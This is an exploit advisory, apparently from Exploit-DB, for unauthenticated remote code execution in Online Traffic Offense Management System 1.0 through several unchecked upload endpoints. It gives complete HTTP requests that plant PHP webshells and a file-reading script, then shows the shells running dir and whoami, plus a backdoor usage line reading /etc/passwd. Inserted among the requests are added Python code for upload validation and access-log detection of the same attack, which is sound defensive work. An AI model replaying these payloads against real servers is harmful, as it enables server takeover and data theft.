Online Traffic Offense Management System 1.0 – Multiple RCE (Unauthenticated)

  • Author: snup
  • Date: 2021-10-07
  • Category:
  • Platform:
  • Source: https://www.exploit-db.com/exploits/50389/

    # Exploit Title: Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)
    # Date: 07/10/2021
    # Exploit Author: Hubert Wojciechowski
    # Contact Author: snup.php@gmail.com
    # Vendor Homepage: https://www.sourcecodester.com
    # Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
    # Version: 1.0
    # Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
    
    ### RCE - Remote Code Execution
    
    # All requests can be sent by both an authenticated and a non-authenticated user
    
    # RCE - the vulnerability can be exploited through several upload paths, all of which store the file under the web root without checking its type:
    
    * Driver list: any file can be uploaded as the driver photo - http://localhost/traffic_offense/classes/Master.php?f=save_driver
    
    * System information page: any file can be uploaded as the system logo or portal cover - http://localhost/traffic_offense/admin/?page=system_info
    
    * User profile: any file can be uploaded as the avatar - http://localhost/traffic_offense/admin/?page=user
    
    * Create a new user with a malicious file as the avatar - http://localhost/traffic_offense/admin/?page=user/manage_user
    
    * Edit another user and replace their avatar with a webshell - http://localhost/traffic_offense/admin/?page=user/manage_user&id=2
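
All five paths share one root cause: the upload handlers trust the client-supplied filename and Content-Type and write the file into a directory where Apache executes `.php`. The following Python function is an added example, not the project's code and not part of the original advisory, of the server-side validation such a fix needs: an extension allowlist, content sniffing by magic bytes, a mismatch check between the claimed and sniffed type, a polyglot guard, and a random server-chosen filename. The function names, the 2 MB limit and the allowlist contents are assumptions; SVG is left out of the allowlist on purpose, since it is XML that can carry script (the directory listing later in the advisory shows an `xss.svg` upload).

```python
import os
import secrets
from typing import Optional

# Image types accepted for avatars, logos, covers and driver photos (assumed allowlist).
# Each stored extension maps to the magic-byte prefixes the content must start with.
ALLOWED_IMAGE_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

MAX_UPLOAD_BYTES = 2 * 1024 * 1024  # assumed limit; tune per deployment

# Markers that have no business inside a raster image; a hit means a polyglot file.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")


class UploadRejected(ValueError):
    """Raised when an upload fails validation; the message is safe to log."""


def sniff_image_type(data: bytes) -> Optional[str]:
    """Return the image extension implied by the leading bytes, or None."""
    for ext, prefixes in ALLOWED_IMAGE_TYPES.items():
        if any(data.startswith(p) for p in prefixes):
            return ext
    return None


def validate_upload(client_filename: str, data: bytes, upload_dir: str = "uploads") -> str:
    """Validate an uploaded image and return the server-chosen relative path.

    The client filename and any client Content-Type never decide how the file
    is stored; only the sniffed content type does.
    """
    if not data:
        raise UploadRejected("empty upload")
    if len(data) > MAX_UPLOAD_BYTES:
        raise UploadRejected("upload exceeds size limit")

    # The client name is normalised only to read its claimed extension.
    base = os.path.basename(client_filename.replace("\\", "/"))
    claimed_ext = base.rsplit(".", 1)[1].lower() if "." in base else ""
    if claimed_ext == "jpeg":
        claimed_ext = "jpg"
    if claimed_ext not in ALLOWED_IMAGE_TYPES:
        raise UploadRejected(f"extension {claimed_ext!r} is not an allowed image type")

    sniffed = sniff_image_type(data)
    if sniffed is None:
        raise UploadRejected("content does not start with a known image signature")
    if sniffed != claimed_ext:
        raise UploadRejected(f"claimed {claimed_ext} but content looks like {sniffed}")

    lowered = data.lower()
    if any(marker in lowered for marker in SCRIPT_MARKERS):
        raise UploadRejected("script marker embedded in image data")

    # Random server-chosen name; the extension comes from the sniffed type, not the client.
    return f"{upload_dir}/{secrets.token_hex(16)}.{sniffed}"


if __name__ == "__main__":
    # Constructed samples: a JPEG-looking header and uploads named like the advisory's payloads.
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 64
    print("stored as", validate_upload("avatar.jpg", jpeg))
    for name, blob in [
        ("cmd.php", b"<?php phpinfo(); ?>"),
        ("cmd.php.jpg", b"<?php phpinfo(); ?>"),
        ("photo.jpg", jpeg + b"<?php echo 1; ?>"),
        ("logo.svg", b"<svg xmlns='http://www.w3.org/2000/svg'/>"),
    ]:
        try:
            validate_upload(name, blob)
        except UploadRejected as exc:
            print(f"{name}: rejected ({exc})")
```

Validation alone is not the whole fix: the advisory shows these handlers answering unauthenticated requests, so each endpoint also needs a session check before any file is touched, and the `uploads/` directory should have script execution disabled at the web-server level so a validation gap cannot turn into code execution.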
    
    -----------------------------------------------------------------------------------------------------------------------
    # POC
    -----------------------------------------------------------------------------------------------------------------------
    
    ## Example 1
    
    # Request sent as an unauthenticated user
    
    POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
    Accept: */*
    Accept-Language: pl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
    Content-Length: 1184
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/traffic_offense/admin/?page=user/manage_user
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    -----------------------------210106920639395210803657370685
    Content-Disposition: form-data; name="id"
    
    
    -----------------------------210106920639395210803657370685
    Content-Disposition: form-data; name="firstname"
    
    hacked
    -----------------------------210106920639395210803657370685
    Content-Disposition: form-data; name="lastname"
    
    hacked
    -----------------------------210106920639395210803657370685
    Content-Disposition: form-data; name="username"
    
    hacked
    -----------------------------210106920639395210803657370685
    Content-Disposition: form-data; name="password"
    
    hacked
    -----------------------------210106920639395210803657370685
    Content-Disposition: form-data; name="type"
    
    1
    -----------------------------210106920639395210803657370685
    Content-Disposition: form-data; name="img"; filename="cmd.php"
    Content-Type: application/octet-stream
    
    <HTML><BODY>
    <FORM METHOD="GET" NAME="myform" ACTION="">
    <INPUT TYPE="text" NAME="x">
    <INPUT TYPE="submit" VALUE="Send">
    </FORM>
    <pre>
    <?php
    if($_REQUEST['x']) {
    system($_REQUEST['x']);
    } else phpinfo();
    ?>
    </pre>
    </BODY></HTML>
    
    
    
    -----------------------------210106920639395210803657370685--
    
    -----------------------------------------------------------------------------------------------------------------------
    # Response
    
    HTTP/1.1 200 OK
    Date: Thu, 07 Oct 2021 07:59:24 GMT
    Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
    X-Powered-By: PHP/7.4.23
    Set-Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Access-Control-Allow-Origin: *
    Content-Length: 1
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    1
    
    -----------------------------------------------------------------------------------------------------------------------
    # The file was uploaded to the uploads directory
    # Request to list files in uploads\
    
    GET /traffic_offense/uploads/ HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: pl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    
    -----------------------------------------------------------------------------------------------------------------------
    # Response
    
    HTTP/1.1 200 OK
    Date: Thu, 07 Oct 2021 08:06:35 GMT
    Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
    Access-Control-Allow-Origin: *
    Content-Length: 2139
    Content-Type: text/html;charset=UTF-8
    
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <html>
     <head>
    <title>Index of /traffic_offense/uploads</title>
     </head>
     <body>
    <h1>Index of /traffic_offense/uploads</h1>
    <table>
     <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
     <tr><th colspan="5"><hr></th></tr>
    <tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/traffic_offense/">Parent Directory</a> </td><td>&nbsp;</td><td align="right">- </td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1629336240_avatar.jpg">1629336240_avatar.jpg</a></td><td align="right">2021-08-19 09:24</td><td align="right"> 11K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1629421080_tl-logo.png">1629421080_tl-logo.png</a> </td><td align="right">2021-08-20 08:58</td><td align="right">5.2K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1633584660_xss.svg">1633584660_xss.svg</a> </td><td align="right">2021-10-07 07:31</td><td align="right">3.4K</td><td>&nbsp;</td></tr>
    <tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="1633593540_cmd.php">1633593540_cmd.php</a> </td>
    [...]
    
    -----------------------------------------------------------------------------------------------------------------------
    # Request to webshell
    
    GET /traffic_offense/uploads/1633593540_cmd.php?x=dir HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: pl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close
    
    -----------------------------------------------------------------------------------------------------------------------
    # Response
    
    HTTP/1.1 200 OK
    Date: Thu, 07 Oct 2021 08:10:10 GMT
    Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
    X-Powered-By: PHP/7.4.23
    Access-Control-Allow-Origin: *
    Content-Length: 810
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    <HTML><BODY>
    <FORM METHOD="GET" NAME="myform" ACTION="">
    <INPUT TYPE="text" NAME="cmd">
    <INPUT TYPE="submit" VALUE="Send">
    </FORM>
    <pre>
     Volume in drive C has no label.
     Volume Serial Number is 283C-C6A0
    
     Directory of C:\xampp\htdocs\traffic_offense\uploads
    
    07.10.2021  10:09    <DIR>          .
    07.10.2021  10:09    <DIR>          ..
    19.08.2021  09:24            11 426 1629336240_avatar.jpg
    20.08.2021  08:58             5 288 1629421080_tl-logo.png
    07.10.2021  07:31             3 451 1633584660_xss.svg
    07.10.2021  09:59               252 1633593540_cmd.php
    07.10.2021  10:02               252 1633593720_cmd.php
    07.10.2021  09:02    <DIR>          drivers
                   5 File(s)         20 669 bytes
                   3 Dir(s)  86 494 085 120 bytes free
    </pre>
    </BODY></HTML>
    
    -----------------------------------------------------------------------------------------------------------------------
    
    ## Example 2
    
    # Webshell uploaded as the System Logo and a second webshell as the Portal Cover on the System Information page
    
    # Request
    
    POST /traffic_offense/classes/SystemSettings.php?f=update_settings HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
    Accept: */*
    Accept-Language: pl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------339921602532596419562348365833
    Content-Length: 3176
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/traffic_offense/admin/?page=system_info
    Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    -----------------------------339921602532596419562348365833
    Content-Disposition: form-data; name="name"
    
    Online Traffic Offense Management System - PHP
    -----------------------------339921602532596419562348365833
    Content-Disposition: form-data; name="short_name"
    
    OTOMS - PHP
    -----------------------------339921602532596419562348365833
    Content-Disposition: form-data; name="about_us"
    
    <p style="text-align: center; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding: 0px; clear: both; border-top: 0px; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding: 0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px -160px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left; text-align: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div id="bannerR" style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div class="boxed" style="margin: 10px 28.7969px; padding: 0px; clear: both; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" text-align:="" center;="" background-color:="" rgb(255,="" 255,="" 255);"=""><div id="lipsum" style="margin: 0px; padding: 0px; text-align: justify;"></div></div></div><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sample only</p>
    
    -----------------------------339921602532596419562348365833
    Content-Disposition: form-data; name="files"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------339921602532596419562348365833
    Content-Disposition: form-data; name="img"; filename="cmd.php"
    Content-Type: application/octet-stream
    
    <HTML><BODY>
    <FORM METHOD="GET" NAME="myform" ACTION="">
    <INPUT TYPE="text" NAME="cmd">
    <INPUT TYPE="submit" VALUE="Send">
    </FORM>
    <pre>
    <?php
    if($_REQUEST['x']) {
    system($_REQUEST['x']);
    } else phpinfo();
    ?>
    </pre>
    </BODY></HTML>
    
    
    
    -----------------------------339921602532596419562348365833
    Content-Disposition: form-data; name="cover"; filename="list.php"
    Content-Type: application/octet-stream
    
    <?php
    
    if($_GET['file']) {
    	$fichero=$_GET['file']; 
    	} else {
    	$fichero="/";
    	} 
    
    if($handle = @opendir($fichero)) {
    while($filename = readdir($handle)) {
    echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filename . "</a><br>";
    }
    closedir($handle);
    } else {
    echo "FILE: " . $fichero . "<br><hr><pre>";
    $fp = fopen($fichero, "r");
    $buffer = fread($fp, filesize($fichero));
    echo $buffer;
    fclose($fp);
    }
    
    ?>
    -----------------------------339921602532596419562348365833--
    
    -----------------------------------------------------------------------------------------------------------------------
    
    # Response
    
    HTTP/1.1 200 OK
    Date: Thu, 07 Oct 2021 08:21:35 GMT
    Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
    X-Powered-By: PHP/7.4.23
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Access-Control-Allow-Origin: *
    Content-Length: 1
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    1
    
    -----------------------------------------------------------------------------------------------------------------------
    
    # The situation is the same as in the previous variant: two files were written to the uploads directory, 1633595040_list.php and 1633595040_cmd.php
    
    ## Example 3
    
    # Webshell uploaded as the photo on the driver list page
    
    # Request
    
    POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: pl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------12210274961293066124133837204
    Content-Length: 2148
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver
    Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    -----------------------------12210274961293066124133837204
    Content-Disposition: form-data; name="id"
    
    
    -----------------------------12210274961293066124133837204
    Content-Disposition: form-data; name="license_id_no"
    
    vvvvvv
    -----------------------------12210274961293066124133837204
    Content-Disposition: form-data; name="lastname"
    
    vvvvvvvvvvv
    -----------------------------12210274961293066124133837204
    Content-Disposition: form-data; name="firstname"
    
    vvv
    -----------------------------12210274961293066124133837204
    Content-Disposition: form-data; name="middlename"
    
    vvvvvvvvvvvvv
    -----------------------------12210274961293066124133837204
    Content-Disposition: form-data; name="dob"
    
    2021-10-07
    -----------------------------12210274961293066124133837204
    Content-Disposition: form-data; name="present_address"
    
    vvvv
    -----------------------------12210274961293066124133837204
    Content-Disposition: form-data; name="permanent_address"
    
    vvvvvvv
    -----------------------------12210274961293066124133837204
    Content-Disposition: form-data; name="civil_status"
    
    Single
    -----------------------------12210274961293066124133837204
    Content-Disposition: form-data; name="nationality"
    
    vvvvvvvvv
    -----------------------------12210274961293066124133837204
    Content-Disposition: form-data; name="contact"
    
    vvvvvvvv
    -----------------------------12210274961293066124133837204
    Content-Disposition: form-data; name="license_type"
    
    Student
    -----------------------------12210274961293066124133837204
    Content-Disposition: form-data; name="image_path"
    
    
    -----------------------------12210274961293066124133837204
    Content-Disposition: form-data; name="img"; filename="simple-backdoor.php"
    Content-Type: application/octet-stream
    
    <!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
    
    <?php
    
    if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
    }
    
    ?>
    
    Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
    
    <!--http://michaeldaw.org 2006-->
    
    -----------------------------12210274961293066124133837204--
    
    -----------------------------------------------------------------------------------------------------------------------
    
    # Response
    
    HTTP/1.1 200 OK
    Date: Thu, 07 Oct 2021 08:35:21 GMT
    Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
    X-Powered-By: PHP/7.4.23
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Access-Control-Allow-Origin: *
    Content-Length: 20
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    {"status":"success"}
    
    -----------------------------------------------------------------------------------------------------------------------
    
    # Request to webshell
    
    GET /traffic_offense/uploads/drivers/19.php?cmd=whoami HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: pl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close
    
    -----------------------------------------------------------------------------------------------------------------------
    
    # Response
    
    HTTP/1.1 200 OK
    Date: Thu, 07 Oct 2021 08:39:15 GMT
    Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
    X-Powered-By: PHP/7.4.23
    Access-Control-Allow-Origin: *
    Content-Length: 95
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    <!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
    
    <pre>desktop-uhrf0c6\hubert
    </pre>
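
Each of the three examples leaves the same trace in the web server's access log: a POST to one of the upload handlers followed by a request for a `.php` file under `/traffic_offense/uploads/` with a command in the query string. The script below is an added example, not part of the original advisory, of detection logic a defender could run over Apache access-log lines. The sample lines are constructed to mirror the requests shown above (the endpoint and upload paths are the application's own; the client addresses, timestamps and the probing `shell.php` line are made up), and the function names are assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Apache "common"/"combined" access-log prefix: client, identd, user, time, request, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Upload handlers named in the advisory.
UPLOAD_ENDPOINTS = {
    "/traffic_offense/classes/Users.php",
    "/traffic_offense/classes/SystemSettings.php",
    "/traffic_offense/classes/Master.php",
}
UPLOAD_DIR_PREFIX = "/traffic_offense/uploads/"
# Extensions the PHP handler would execute; nothing under uploads/ should ever carry one.
SCRIPT_EXTS = (".php", ".php3", ".php5", ".php7", ".phtml", ".phar", ".phps")

# Constructed sample lines modelled on the advisory's requests (addresses and times invented).
SAMPLE_LOG = [
    '127.0.0.1 - - [07/Oct/2021:07:59:24 +0000] "POST /traffic_offense/classes/Users.php?f=save HTTP/1.1" 200 1',
    '127.0.0.1 - - [07/Oct/2021:08:06:35 +0000] "GET /traffic_offense/uploads/ HTTP/1.1" 200 2139',
    '127.0.0.1 - - [07/Oct/2021:08:10:10 +0000] "GET /traffic_offense/uploads/1633593540_cmd.php?x=dir HTTP/1.1" 200 810',
    '10.0.0.5 - - [07/Oct/2021:08:12:00 +0000] "GET /traffic_offense/uploads/1629336240_avatar.jpg HTTP/1.1" 200 11426',
    '10.0.0.5 - - [07/Oct/2021:08:35:21 +0000] "POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1" 200 20',
    '10.0.0.5 - - [07/Oct/2021:08:39:15 +0000] "GET /traffic_offense/uploads/drivers/19.php?cmd=whoami HTTP/1.1" 200 95',
    '192.0.2.9 - - [07/Oct/2021:09:00:00 +0000] "GET /traffic_offense/uploads/shell.php HTTP/1.1" 404 196',
    "this line is not an access-log record",
]


def parse_line(line: str) -> Optional[dict]:
    """Parse one access-log line; return None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"], rec["query"] = parts.path, parts.query
    return rec


def is_script_under_uploads(path: str) -> bool:
    """True when a request targets an executable script inside the uploads tree."""
    return path.startswith(UPLOAD_DIR_PREFIX) and path.lower().endswith(SCRIPT_EXTS)


def analyze(lines: List[str]) -> Dict[str, List[str]]:
    """Return findings per client IP, in log order.

    A script request under uploads/ from a client that earlier POSTed to an upload
    handler is labelled WEBSHELL-CHAIN; one without a preceding upload from the
    same client (e.g. a scanner guessing names) is labelled SCRIPT-UNDER-UPLOADS.
    """
    findings: Dict[str, List[str]] = defaultdict(list)
    uploaders = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path = rec["ip"], rec["path"]
        if rec["method"] == "POST" and path in UPLOAD_ENDPOINTS:
            uploaders.add(ip)
            findings[ip].append(f"UPLOAD-POST {rec['target']}")
        elif is_script_under_uploads(path):
            label = "WEBSHELL-CHAIN" if ip in uploaders else "SCRIPT-UNDER-UPLOADS"
            findings[ip].append(f"{label} {rec['status']} {rec['target']}")
    return dict(findings)


if __name__ == "__main__":
    for ip, items in analyze(SAMPLE_LOG).items():
        for item in items:
            print(ip, item)
```

The same rule is easy to carry into a SIEM query: any 200 response for a script extension below the uploads directory is a high-confidence indicator on its own, because a correctly configured deployment never serves executable content from there; the upload-POST correlation only adds attribution.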